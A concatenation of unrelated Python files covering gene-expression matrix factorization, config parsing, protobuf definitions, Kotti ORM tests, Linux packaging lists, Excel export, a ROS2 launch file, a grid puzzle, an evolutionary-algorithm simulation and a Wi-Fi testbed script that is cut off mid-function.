nonZerosInd = np.nonzero(A)
numNonZeros = nonZerosInd[0].size
nonZeroElem = np.concatenate((nonZerosInd[0].reshape(numNonZeros, 1), nonZerosInd[1].reshape(numNonZeros, 1)),
axis=1)
for step in range(self.steps):
if self.calculateLossFunc:
for element in nonZeroElem:
g = element[0]
c = element[1]
LossFuncCG = LossFunctionConstantCoefficientVariation(u[g][c], a[g][c], A[g][c], G, H, g, c)
LossFunc = LossFunc + LossFuncCG
else:
LossFunc = (step + 1)*self.eps
if abs(LossFunc - LossFuncGre) < self.eps:
Lossf.append(LossFunc)
print("already converge")
break
else:
Lossf.append(LossFunc)
LossFuncGre = LossFunc
LossFunc = 0
np.random.shuffle(nonZeroElem)
batchElements = nonZeroElem[0:self.batchSize - 1, :]
for element in batchElements:
g = element[0]
c = element[1]
if u[g][c] <= 0.01:
u[g][c] = 0.01
if ag[g][0] <= 1e-09:
ag[g][0] = 1e-09
if ac[0][c] <= 1e-09:
ac[0][c] = 1e-09
dG, dH, dag, dac = CCVOptimize(A, G, H, u, ag, ac, a, g, c)
G[g, :] = G[g, :] + self.alpha * dG
H[:, c] = H[:, c] + self.alpha * dH
ag[g, :] = ag[g, :] + self.alpha * dag
u = np.dot(G, H)
a = np.dot(ag, ac)
print("number of iteration: ", step + 1, "/", self.steps)
u = np.dot(G, H)
u[u < 0] = 0
return u, G, H
def smurf_impute(self, initialDataFrame):
self.initialDataFrame = initialDataFrame
self.genes = initialDataFrame.shape[0]
self.cells = initialDataFrame.shape[1]
self.genesNames = initialDataFrame._stat_axis.values.tolist()
self.cellsNames = initialDataFrame.columns.values.tolist()
print("Running SCEnd on {} cells and {} genes".format(self.cells, self.genes))
if self.normalize:
print("normalizing data by library size...")
normalizedDataframe, self.size_factors = utiles.dataNormalization(self.initialDataFrame)
self.A = normalizedDataframe.values
self.G, self.H = initialMatrices(normalizedDataframe.values, self.K)
self._check_params()
print("preprocessing data...")
if self.noise_model == "CV":
u, G, H = self.MFConstantVariance()
if self.noise_model == "Fano":
u, G, H = self.MFFano()
if self.noise_model == "CCV":
u, G, H = self.MFConstCoeffiVariation()
newDataFrame = pd.DataFrame(u, index=self.genesNames, columns=self.cellsNames)
newDataFrame = newDataFrame * self.size_factors
res = {}
res["estimate"] = newDataFrame
res["gene latent factor matrix"] = pd.DataFrame(G, index=self.genesNames, columns=None)
res["cell latent factor matrix"] = pd.DataFrame(H, index=None, columns=self.cellsNames)
self.glfm = G
self.clfm = H
if self.estmate_only:
return res["estimate"]
else:
return res
else:
self.A = self.initialDataFrame.values
self.G, self.H = initialMatrices(self.initialDataFrame.values, self.K)
self._check_params()
print("preprocessing data...")
if self.noise_model == "CV":
u, G, H = self.MFConstantVariance()
if self.noise_model == "Fano":
u, G, H = self.MFFano()
if self.noise_model == "CCV":
u, G, H = self.MFConstCoeffiVariation()
newDataFrame = pd.DataFrame(u, index=self.genesNames, columns=self.cellsNames)
res = {}
res["estimate"] = newDataFrame
res["gene latent factor matrix"] = pd.DataFrame(G, index=self.genesNames, columns=None)
res["cell latent factor matrix"] = pd.DataFrame(H, index=None, columns=self.cellsNames)
self.glfm = G
self.clfm = H
if self.estmate_only:
return res["estimate"]
else:
return res
def smurf_cell_circle(self, cells_data=None, n_neighbors=20, min_dist=0.01, major_axis=3, minor_axis=2, k=0.2):
self.n_neighbors = n_neighbors
self.min_dist = min_dist
self.major_axis = major_axis
self.minor_axis = minor_axis
self.k = k
if cells_data:
data = cells_data
else:
if self.clfm.all():
data = self.clfm
else:
raise AttributeError("Cells Data Expected")
cell_circle_mapper = CellCircle(n_neighbors=self.n_neighbors, min_dist=self.min_dist)
        res = cell_circle_mapper.cal_cell_circle(data, a=self.major_axis, b=self.minor_axis, k=self.k)
return res
|
""" Utilities for parsing settings """
def asdict(setting, value_type=lambda x: x):
"""
Parses config values from .ini file and returns a dictionary
Parameters
----------
setting : str
The setting from the config.ini file
value_type : callable
Run this function on the values of the dict
Returns
-------
data : dict
"""
result = {}
if setting is None:
return result
if isinstance(setting, dict):
return setting
for line in [line.strip() for line in setting.splitlines()]:
if not line:
continue
key, value = line.split('=', 1)
result[key.strip()] = value_type(value.strip())
return result
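# A minimal usage sketch (not part of the original module): the triple-quoted string
# below stands in for a raw multi-line value read from config.ini, and value_type is
# used to coerce the parsed values.
if __name__ == "__main__":
    raw_setting = """
    timeout = 30
    retries = 5
    """
    print(asdict(raw_setting, value_type=int))  # -> {'timeout': 30, 'retries': 5}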
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: app_health_config_variable.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='app_health_config_variable.proto',
package='monitor_config',
syntax='proto3',
serialized_options=_b('ZHgo.easyops.local/contracts/protorepo-models/easyops/model/monitor_config'),
serialized_pb=_b('\n app_health_config_variable.proto\x12\x0emonitor_config\"l\n\x17\x41ppHealthConfigVariable\x12\x0c\n\x04type\x18\x01 \x01(\t\x12\n\n\x02id\x18\x02 \x01(\t\x12\x0c\n\x04\x66rom\x18\x03 \x01(\t\x12\x0c\n\x04name\x18\x04 \x01(\t\x12\x0c\n\x04\x61ttr\x18\x05 \x01(\t\x12\r\n\x05value\x18\x06 \x03(\tBJZHgo.easyops.local/contracts/protorepo-models/easyops/model/monitor_configb\x06proto3')
)
_APPHEALTHCONFIGVARIABLE = _descriptor.Descriptor(
name='AppHealthConfigVariable',
full_name='monitor_config.AppHealthConfigVariable',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='monitor_config.AppHealthConfigVariable.type', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='id', full_name='monitor_config.AppHealthConfigVariable.id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='from', full_name='monitor_config.AppHealthConfigVariable.from', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='monitor_config.AppHealthConfigVariable.name', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='attr', full_name='monitor_config.AppHealthConfigVariable.attr', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='monitor_config.AppHealthConfigVariable.value', index=5,
number=6, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=52,
serialized_end=160,
)
DESCRIPTOR.message_types_by_name['AppHealthConfigVariable'] = _APPHEALTHCONFIGVARIABLE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
AppHealthConfigVariable = _reflection.GeneratedProtocolMessageType('AppHealthConfigVariable', (_message.Message,), {
'DESCRIPTOR' : _APPHEALTHCONFIGVARIABLE,
'__module__' : 'app_health_config_variable_pb2'
# @@protoc_insertion_point(class_scope:monitor_config.AppHealthConfigVariable)
})
_sym_db.RegisterMessage(AppHealthConfigVariable)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
import json
from mock import MagicMock
from pyramid.security import ALL_PERMISSIONS
class TestNestedMutationDict:
def test_dictwrapper_comparison(self):
from kotti.sqla import NestedMutationDict
assert NestedMutationDict({}) == NestedMutationDict({})
assert (
NestedMutationDict({'a': 'ok'}) == NestedMutationDict({'a': 'ok'}))
def test_listwrapper_comparison(self):
from kotti.sqla import NestedMutationList
assert NestedMutationList({}) == NestedMutationList({})
assert (
NestedMutationList(['ok']) == NestedMutationList(['ok']))
def test_dictwrapper_changed(self):
from kotti.sqla import NestedMutationDict
data = {}
wrapper = NestedMutationDict(data)
changed = wrapper.changed = MagicMock()
wrapper['name'] = 'andy'
assert data == {'name': 'andy'}
assert wrapper == {'name': 'andy'}
assert wrapper['name'] == 'andy'
assert changed.call_count == 1
wrapper['age'] = 77
assert data == {'name': 'andy', 'age': 77}
assert wrapper['age'] == 77
assert wrapper['name'] == 'andy'
assert changed.call_count == 2
wrapper['age'] += 1
assert data == {'name': 'andy', 'age': 78}
assert wrapper['age'] == 78
assert changed.call_count == 3
def test_listwrapper_changed(self):
from kotti.sqla import NestedMutationList
data = []
wrapper = NestedMutationList(data)
changed = wrapper.changed = MagicMock()
wrapper.append(5)
assert data == [5]
assert wrapper == [5]
assert wrapper[0] == 5
assert changed.call_count == 1
wrapper.insert(0, 33)
assert data == [33, 5]
assert wrapper[0] == 33
assert changed.call_count == 2
del wrapper[0]
assert data == [5]
assert wrapper[0] == 5
assert changed.call_count == 3
def test_dictwrapper_wraps(self):
from kotti.sqla import NestedMutationDict
from kotti.sqla import NestedMutationList
wrapper = NestedMutationDict(
{'name': 'andy', 'age': 77, 'children': []})
changed = wrapper.changed = MagicMock()
wrapper['name'] = 'randy'
assert changed.call_count == 1
assert isinstance(wrapper['children'], NestedMutationList)
wrapper['children'].append({'name': 'sandy', 'age': 33})
assert changed.call_count == 2
        assert len(wrapper['children']) == 1
assert isinstance(wrapper['children'][0], NestedMutationDict)
def test_listwrapper_wraps(self):
from kotti.sqla import NestedMutationDict
from kotti.sqla import NestedMutationList
wrapper = NestedMutationList(
[{'name': 'andy', 'age': 77, 'children': []}])
changed = wrapper.changed = MagicMock()
assert isinstance(wrapper[0], NestedMutationDict)
assert isinstance(wrapper[0]['children'], NestedMutationList)
assert changed.call_count == 0
def test_setdefault_dict(self):
from kotti.sqla import NestedMutationDict
mdict = NestedMutationDict({})
assert isinstance(mdict.setdefault('bar', {}), NestedMutationDict)
def test_setdefault_list(self):
from kotti.sqla import NestedMutationDict
from kotti.sqla import NestedMutationList
mdict = NestedMutationDict({})
assert isinstance(mdict.setdefault('bar', []), NestedMutationList)
def test_setdefault_parent(self):
from kotti.sqla import NestedMutationDict
mdict = NestedMutationDict({})
assert mdict.setdefault('bar', []).__parent__ is mdict
def test_dunder_json(self):
from kotti.sqla import NestedMutationDict
data = {"some": ["other", {"stuff": 1}]}
mdict = NestedMutationDict(data)
assert json.loads(json.dumps(mdict.__json__(None))) == data
class TestJsonType:
def make(self):
from kotti.sqla import JsonType
return JsonType()
def test_process_bind_param_no_value(self):
value = self.make().process_bind_param(None, None)
assert value is None
def test_process_bind_param_with_value(self):
value = self.make().process_bind_param([{'foo': 'bar'}], None)
assert value == '[{"foo": "bar"}]'
def test_process_bind_param_with_mutationlist(self):
from kotti.sqla import MutationList
value = self.make().process_bind_param(
MutationList([{'foo': 'bar'}]), None)
assert value == '[{"foo": "bar"}]'
def test_process_result_value_no_value(self):
value = self.make().process_result_value(None, None)
assert value is None
def test_process_result_value_with_value(self):
value = self.make().process_result_value('[{"foo": "bar"}]', None)
assert value == [{"foo": "bar"}]
class TestACLType:
def make(self):
from kotti.sqla import ACLType
return ACLType()
def test_process_bind_param_no_value(self):
value = self.make().process_bind_param(None, None)
assert value is None
def test_process_bind_param_with_value(self):
value = self.make().process_bind_param(
[('Allow', 'role:admin', 'edit')], None)
assert value == '[["Allow", "role:admin", "edit"]]'
def test_process_bind_param_with_default_permissions(self):
acl = [('Allow', 'role:admin', ALL_PERMISSIONS)]
value = self.make().process_bind_param(acl, None)
assert value == '[]'
def test_process_bind_param_with_empty_list(self):
value = self.make().process_bind_param([], None)
assert value == '[]'
def test_process_bind_param_with_default_permissions_and_others(self):
acl = [
('Allow', 'role:admin', ALL_PERMISSIONS),
('Deny', 'role:admin', 'edit'),
]
value = self.make().process_bind_param(acl, None)
assert value == '[["Deny", "role:admin", "edit"]]'
assert self.make().process_result_value(value, None) == acl
def test_process_result_value_no_value(self):
value = self.make().process_result_value(None, None)
assert value is None
def test_process_result_value_with_value(self):
acl = self.make().process_result_value(
'[["Allow", "role:admin", "edit"]]', None)
assert acl == [
('Allow', 'role:admin', ALL_PERMISSIONS),
('Allow', 'role:admin', 'edit'),
]
class TestMutationList:
def test_radd(self):
from kotti.sqla import MutationList
mlist = MutationList(['foo'])
assert ['bar'] + mlist == ['bar', 'foo']
class TestMutationDunderJson:
def test_dunder_json(self):
from kotti.sqla import MutationList
mlist = MutationList(['foo'])
        assert json.loads(json.dumps(mlist.__json__())) == ['foo']
def test_dunder_json_recursive(self):
from kotti.sqla import MutationList
from kotti.sqla import MutationDict
mlist = MutationList([
MutationDict({'foo': MutationList([{'bar': 'baz'}])}),
{'foo': ['bar', 'baz']},
])
        assert json.loads(json.dumps(mlist.__json__())) == [
            {'foo': [{'bar': 'baz'}]},
            {'foo': ['bar', 'baz']},
        ]
mdict = MutationDict({
'foo': MutationList([{'bar': 'baz'}]),
'bar': ['bar', 'baz'],
})
        assert json.loads(json.dumps(mdict.__json__())) == {
            'foo': [{'bar': 'baz'}],
            'bar': ['bar', 'baz'],
        }
|
"""
List of Linux distributions that get packaging
https://wiki.ubuntu.com/Releases
https://www.debian.org/releases/
https://fedoraproject.org/wiki/Releases
https://fedoraproject.org/wiki/End_of_life
"""
ubuntu_deps = ["torsocks", "python3", "openssh-client", "sshfs", "conntrack"]
ubuntu_deps_2 = ubuntu_deps + ["python3-distutils"]
install_deb = """
apt-get -qq update
dpkg --unpack {} > /dev/null
apt-get -qq -f install > /dev/null
"""
fedora_deps = [
"python3", "torsocks", "openssh-clients", "sshfs", "conntrack-tools"
]
install_rpm = """
dnf -qy install {}
"""
distros = [
("ubuntu", "xenial", "deb", ubuntu_deps, install_deb), # 16.04 (LTS2021)
("ubuntu", "bionic", "deb", ubuntu_deps_2, install_deb), # 18.04 (LTS2023)
("ubuntu", "eoan", "deb", ubuntu_deps_2, install_deb), # 19.10 20200717
# ("ubuntu", "focal", "deb", ubuntu_deps_2, install_deb), # 20.04 (LTS2025)
("debian", "stretch", "deb", ubuntu_deps, install_deb), # 9
("debian", "buster", "deb", ubuntu_deps_2, install_deb), # 10
("fedora", "26", "rpm", fedora_deps, install_rpm), # EOL 2018-05-29
("fedora", "27", "rpm", fedora_deps, install_rpm), # EOL 2018-11-30
("fedora", "28", "rpm", fedora_deps, install_rpm), # EOL 2019-05-28
("fedora", "29", "rpm", fedora_deps, install_rpm), # EOL 2019-11-30
("fedora", "30", "rpm", fedora_deps, install_rpm), # EOL 2020-05-26
("fedora", "31", "rpm", fedora_deps, install_rpm),
# ("fedora", "32", "rpm", fedora_deps, install_rpm),
]
|
import pandas as pd
# Create a Pandas dataframe from some data.
data = [10, 20, 30, 40, 50, 60]
df = pd.DataFrame({'Heading': data,
'Longer heading that should be wrapped' : data})
out_path = r'C:\Users\Gael\Desktop\export_dataframe.xlsx'
# Create a Pandas Excel writer using XlsxWriter as the engine.
writer = pd.ExcelWriter(out_path, engine='xlsxwriter')
# Convert the dataframe to an XlsxWriter Excel object. Note that we turn off
# the default header and skip one row to allow us to insert a user defined
# header.
df.to_excel(writer, sheet_name='Sheet1', startrow=1,startcol=0, header=False, index=False)
# Get the xlsxwriter workbook and worksheet objects.
workbook = writer.book
worksheet = writer.sheets['Sheet1']
# Add a header format.
header_format = workbook.add_format({
'bold': True,
'text_wrap': True,
'valign': 'top',
'fg_color': '#D7E4BC',
'border': 1})
header_fmt = workbook.add_format({'font_name': 'Arial', 'font_size': 10, 'bold': True})
red_format = workbook.add_format({'bg_color':'red'})
worksheet.merge_range('B4:D4', 'Merged Range', header_format)
# Write the column headers with the defined format.
for col_num, value in enumerate(df.columns.values):
worksheet.write(0, col_num, value, header_format)
# Close the Pandas Excel writer and output the Excel file.
writer.save()
######FILLING EXCEL FILE ########
from openpyxl import load_workbook
import glob
import os
directory = r'C:\Users\Gael\Desktop\CODE\python'
all_files = glob.glob(os.path.join(directory, "*.xlsx"))
def forwardfill(file):
    df_flat_file = pd.read_excel(file, sheet_name=0, skiprows=1)
df_filled_file = df_flat_file.ffill()
book = load_workbook(file)
writer = pd.ExcelWriter(file, engine='openpyxl')
writer.book = book
writer.sheets = {ws.title: ws for ws in book.worksheets}
for sheetname in writer.sheets:
df_filled_file.to_excel(writer, sheet_name=sheetname, startrow=1, startcol=0, index=False, header=False)
writer.save()
for path in all_files:
forwardfill(path)
|
#
# LGE Advanced Robotics Laboratory
# Copyright (c) 2020 LG Electronics Inc., LTD., Seoul, Korea
# All Rights are Reserved.
#
# SPDX-License-Identifier: MIT
#
import os
import sys
import launch.actions
import launch_ros.actions
from ament_index_python.packages import get_package_share_directory
from launch import LaunchDescription
from launch.actions import DeclareLaunchArgument
from launch_ros.actions import Node
from launch.substitutions import LaunchConfiguration
sys.path.append(os.path.abspath(os.path.dirname(__file__)))
from cloud_bridge_launch_common import *
def generate_launch_description():
# Set remapping topic list
remap_topic_list = ['tf', 'tf_static']
# Get the launch directory
config_dir = os.path.join(get_package_share_directory("cloud_bridge"), 'config')
# Get config filename
config_filename = os.path.join(config_dir, 'server.yaml')
param_filename = os.path.join(config_dir, 'params.yaml')
# Create our own temporary YAML files that include substitutions
rewritten_list = ['manage_port', 'sub_port', 'pub_port', 'req_port', 'rep_port']
configured_params = get_configured_params(config_filename, rewritten_list)
# Get namespace in argument
namespace = find_robot_name()
# Set remapping topic tuple list
remapping_list = set_remapping_list(remap_topic_list)
# Create environment variables
stdout_linebuf_envvar = launch.actions.SetEnvironmentVariable(
'RCUTILS_CONSOLE_STDOUT_LINE_BUFFERED', '1')
# Create actions nodes
cloud_trans_server = launch_ros.actions.Node(
package='cloud_bridge',
node_executable='cloud_bridge_server',
node_namespace=namespace,
remappings=remapping_list,
parameters=[configured_params, param_filename],
output='screen')
# Create the launch description and populate
ld = launch.LaunchDescription()
ld.add_action(stdout_linebuf_envvar)
ld.add_action(cloud_trans_server)
return ld
|
import tkinter as tk
from tkinter import messagebox
root = tk.Tk()
root.withdraw()
__all__ = ['universal']
|
import itertools
import sys
import typing
from copy import deepcopy
class Point(typing.NamedTuple):
x: int
y: int
Grid = list[list[str]]
def main():
with open(sys.argv[1]) as f:
grid: Grid = [list(line.strip()) for line in f.readlines()]
height = len(grid)
width = len(grid[0])
turn = 0
for turn in itertools.count(1):
grid, move_count = iterate(grid, height, width)
if move_count == 0:
break
print(turn)
def iterate(grid: Grid, height: int, width: int) -> tuple[Grid, int]:
new_grid = deepcopy(grid)
move_count = 0
# east
for m in east_moves(grid, height, width):
move_count += 1
new_grid[m.y][m.x] = '.'
new_grid[m.y][(m.x + 1) % width] = '>'
# south
for m in list(south_moves(new_grid, height, width)):
move_count += 1
new_grid[m.y][m.x] = '.'
new_grid[(m.y + 1) % height][m.x] = 'v'
return new_grid, move_count
def east_moves(grid: Grid, height: int, width: int) -> typing.Iterable[Point]:
for y in range(height):
for x in range(width):
if grid[y][x] == '>' and grid[y][(x + 1) % width] == '.':
yield Point(x, y)
def south_moves(grid: Grid, height: int, width: int) -> typing.Iterable[Point]:
for y in range(height):
for x in range(width):
if grid[y][x] == 'v' and grid[(y + 1) % height][x] == '.':
yield Point(x, y)
if __name__ == '__main__':
main()
|
"""Run a discrete-event simulation of an asynchronous evolutionary
algorithm with only cloning and selection, so we can track the
takeover times of particular genomes."""
import inspect
import os
import sys
from matplotlib import pyplot as plt
import numpy as np
import toolz
from leap_ec import ops, probe
from leap_ec import Individual, Representation
from leap_ec.algorithm import generational_ea
from leap_ec.problem import ConstantProblem, FunctionProblem
from leap_ec.real_rep import problems as real_prob
from async_sim import components as co
##############################
# Entry point
##############################
if __name__ == '__main__':
##############################
# Parameters
##############################
gui = True
# When running the test harness, just run for two generations
# (we use this to quickly ensure our examples don't get bitrot)
if os.environ.get(co.test_env_var, False) == 'True':
jobs = 1
max_births = 2
else:
jobs = 50
max_births=float('inf') # No limit on births; stopping condition is max_time
max_time = 10000
pop_size = 50
num_processors=pop_size
modulo = 10
low_eval_time = 1
high_eval_time = 100
init_strategy = 'immediate' # Can be 'immediate', 'until_all_evaluating', or 'extra'
##############################
# Problem
##############################
problem = FunctionProblem(lambda x: 0 if x=='LOW' else 100, maximize=True)
eval_time_prob = FunctionProblem(lambda x: low_eval_time if x=='LOW' else high_eval_time, maximize=True)
##############################
# Setup
##############################
#experiment_note = f"\"takover (low={low_eval_time}, high={high_eval_time})\""
#experiment_note = init_strategy
experiment_note = "select(parents+processing)"
eval_time_f = lambda x: eval_time_prob.evaluate(x)
plt.figure(figsize=(20, 4))
##############################
# Evolve
##############################
with open('birth_times.csv', 'w') as births_file:
for job_id in range(jobs):
##############################
# Setup Metrics and Simulation
##############################
if gui:
plt.subplot(144) # Put the Gantt plot on the far right
p = co.GanttPlotProbe(ax=plt.gca(), max_bars=100, modulo=modulo)
gui_steadystate_probes = [ p ]
else:
gui_steadystate_probes = []
# Set up the cluster simulation.
# This mimics an asynchronous evaluation engine, which may return individuals in an order different than they were submitted.
eval_cluster = co.AsyncClusterSimulation(
num_processors=num_processors,
eval_time_function=eval_time_f,
# Individual-level probes (these run just on the newly evaluated individual)
probes=[
probe.AttributesCSVProbe(attributes=['birth', 'start_time', 'end_time', 'eval_time'],
notes={ 'job': job_id }, header=(job_id==0), stream=births_file)
] + gui_steadystate_probes)
            # Set up probes for real-time visualization
if gui:
plt.subplot(141)
p1 = probe.HistPhenotypePlotProbe(ax=plt.gca(), modulo=modulo, title="Genotype Histogram")
plt.subplot(142)
p2 = probe.PopulationMetricsPlotProbe(ax=plt.gca(), modulo=modulo,
title="Fraction of Population with 'HIGH' genotype (by step).",
metrics=[ lambda x: len([ ind for ind in x if ind.genome == 'HIGH'])/len(x) ])
plt.subplot(143)
p3 = probe.PopulationMetricsPlotProbe(ax=plt.gca(), modulo=modulo,
title="Fraction of Population with 'HIGH' genotype (by time).",
metrics=[ lambda x: len([ ind for ind in x if ind.genome == 'HIGH'])/len(x) ],
x_axis_value=lambda: eval_cluster.time)
# Leave the dashboard in its own window
p4 = co.AsyncClusterDashboardProbe(cluster_sim=eval_cluster, modulo=modulo)
gui_probes = [ p1, p2, p3, p4 ]
else:
gui_probes = []
# Defining representation up front, so we can use it a couple different places
representation=Representation(
# Initialize a population of integer-vector genomes
initialize=co.single_high_initializer()
)
# GO!
ea = generational_ea(max_generations=max_births,pop_size=pop_size,
# Stopping condition is based on simulation time
stop=lambda x: eval_cluster.time > max_time,
# We use an asynchronous scheme to evaluate the initial population
init_evaluate=co.async_init_evaluate(
cluster_sim=eval_cluster,
strategy=init_strategy,
create_individual=lambda: representation.create_individual(problem)),
problem=problem, # Fitness function
# Representation
representation=representation,
# Operator pipeline
pipeline=[
co.steady_state_step(
reproduction_pipeline=[
#ops.random_selection,
co.select_with_processing(ops.random_selection, eval_cluster),
ops.clone
],
insert=co.competition_inserter(p_accept_even_if_worse=0.0, pop_size=pop_size,
replacement_selector=ops.random_selection
),
# This tells the steady-state algorithm to use asynchronous evaluation
evaluation_op=co.async_evaluate(cluster_sim=eval_cluster)
),
# Population-level probes (these run on all individuals in the population)
probe.FitnessStatsCSVProbe(stream=sys.stdout, header=(job_id==0), modulo=modulo,
comment=inspect.getsource(sys.modules[__name__]), # Put the entire source code in the comments
notes={'experiment': experiment_note, 'job': job_id},
extra_metrics={
'time': lambda x: eval_cluster.time,
'birth': lambda x: eval_cluster.birth,
'mean_eval_time': lambda x: np.mean([ind.eval_time for ind in x]),
'LOW_ratio': lambda x: len([ ind for ind in x if ind.genome == 'LOW'])/len(x),
'HIGH_ratio': lambda x: len([ ind for ind in x if ind.genome == 'HIGH'])/len(x)
}
)
] + gui_probes
)
# Er, actually go!
list(ea)
|
#!/usr/bin/python3 -u
# Example to set profile on NOLA-12 testbed:
# ./sdk_set_profile.py --testrail-user-id NONE --model ecw5410 --ap-jumphost-address localhost --ap-jumphost-port 8823 --ap-jumphost-password pumpkin77 \
# --ap-jumphost-tty /dev/ttyAP1 --testbed "NOLA-12" --lanforge-ip-address localhost --lanforge-port-number 8822 \
# --default-ap-profile TipWlan-2-Radios --sdk-base-url https://wlan-portal-svc-ben-testbed.cicd.lab.wlan.tip.build --skip-radius
# Example to set profile on NOLA-01 testbed
# ./sdk_set_profile.py --testrail-user-id NONE --model ecw5410 --ap-jumphost-address localhost --ap-jumphost-port 8803 \
# --ap-jumphost-password pumpkin77 --ap-jumphost-tty /dev/ttyAP1 --testbed "NOLA-01" --lanforge-ip-address localhost \
# --lanforge-port-number 8802 --default-ap-profile TipWlan-2-Radios --sdk-base-url https://wlan-portal-svc.cicd.lab.wlan.tip.build \
# --skip-radius
import sys
sys.path.append(f'../tests')
from UnitTestBase import *
from cloudsdk import CreateAPProfiles
def main():
parser = argparse.ArgumentParser(description="SDK Set Profile", add_help=False)
parser.add_argument("--default-ap-profile", type=str,
help="Default AP profile to use as basis for creating new ones, typically: TipWlan-2-Radios or TipWlan-3-Radios",
required=True)
parser.add_argument("--skip-radius", dest="skip_radius", action='store_true',
help="Should we skip the RADIUS configs or not")
parser.add_argument("--skip-wpa", dest="skip_wpa", action='store_true',
help="Should we skip the WPA ssid or not")
parser.add_argument("--skip-wpa2", dest="skip_wpa2", action='store_true',
help="Should we skip the WPA2 ssid or not")
parser.set_defaults(skip_radius=False)
parser.set_defaults(skip_wpa=False)
parser.set_defaults(skip_wpa2=False)
parser.add_argument("--skip-profiles", dest="skip_profiles", action='store_true',
help="Should we skip creating new ssid profiles?")
parser.set_defaults(skip_profiles=False)
parser.add_argument("--psk-5g-wpa2", type=str,
help="Allow over-riding the 5g-wpa2 PSK value.")
parser.add_argument("--psk-5g-wpa", type=str,
help="Allow over-riding the 5g-wpa PSK value.")
parser.add_argument("--psk-2g-wpa2", type=str,
help="Allow over-riding the 2g-wpa2 PSK value.")
parser.add_argument("--psk-2g-wpa", type=str,
help="Allow over-riding the 2g-wpa PSK value.")
parser.add_argument("--ssid-5g-wpa2", type=str,
help="Allow over-riding the 5g-wpa2 SSID value.")
parser.add_argument("--ssid-5g-wpa", type=str,
help="Allow over-riding the 5g-wpa SSID value.")
parser.add_argument("--ssid-2g-wpa2", type=str,
help="Allow over-riding the 2g-wpa2 SSID value.")
parser.add_argument("--ssid-2g-wpa", type=str,
help="Allow over-riding the 2g-wpa SSID value.")
base = UnitTestBase("skd-set-profile", parser)
command_line_args = base.command_line_args
# cmd line takes precedence over env-vars.
cloudSDK_url = command_line_args.sdk_base_url # was os.getenv('CLOUD_SDK_URL')
local_dir = command_line_args.local_dir # was os.getenv('SANITY_LOG_DIR')
report_path = command_line_args.report_path # was os.getenv('SANITY_REPORT_DIR')
report_template = command_line_args.report_template # was os.getenv('REPORT_TEMPLATE')
## TestRail Information
tr_user = command_line_args.testrail_user_id # was os.getenv('TR_USER')
tr_pw = command_line_args.testrail_user_password # was os.getenv('TR_PWD')
milestoneId = command_line_args.milestone # was os.getenv('MILESTONE')
projectId = command_line_args.testrail_project # was os.getenv('PROJECT_ID')
testRunPrefix = command_line_args.testrail_run_prefix # os.getenv('TEST_RUN_PREFIX')
##Jfrog credentials
jfrog_user = command_line_args.jfrog_user_id # was os.getenv('JFROG_USER')
jfrog_pwd = command_line_args.jfrog_user_password # was os.getenv('JFROG_PWD')
##EAP Credentials
identity = command_line_args.eap_id # was os.getenv('EAP_IDENTITY')
ttls_password = command_line_args.ttls_password # was os.getenv('EAP_PWD')
## AP Credentials
ap_username = command_line_args.ap_username # was os.getenv('AP_USER')
##LANForge Information
lanforge_ip = command_line_args.lanforge_ip_address
lanforge_port = command_line_args.lanforge_port_number
lanforge_prefix = command_line_args.lanforge_prefix
lanforge_2g_radio = command_line_args.lanforge_2g_radio
lanforge_5g_radio = command_line_args.lanforge_5g_radio
build = command_line_args.build_id
logger = base.logger
hdlr = base.hdlr
if command_line_args.testbed == None:
print("ERROR: Must specify --testbed argument for this test.")
sys.exit(1)
client: TestRail_Client = TestRail_Client(command_line_args)
###Get Cloud Bearer Token
cloud: CloudSDK = CloudSDK(command_line_args)
bearer = cloud.get_bearer(cloudSDK_url, cloud_type)
cloud.assert_bad_response = True
model_id = command_line_args.model
equipment_id = command_line_args.equipment_id
print("equipment-id: %s" % (equipment_id))
if equipment_id == "-1":
eq_id = ap_ssh_ovsh_nodec(command_line_args, 'id')
print("EQ Id: %s" % (eq_id))
# Now, query equipment to find something that matches.
eq = cloud.get_customer_equipment(cloudSDK_url, bearer, customer_id)
for item in eq:
for e in item['items']:
print(e['id'], " ", e['inventoryId'])
if e['inventoryId'].endswith("_%s" % (eq_id)):
print("Found equipment ID: %s inventoryId: %s" % (e['id'], e['inventoryId']))
equipment_id = str(e['id'])
if equipment_id == "-1":
print("ERROR: Could not find equipment-id.")
sys.exit(1)
###Get Current AP Firmware and upgrade
try:
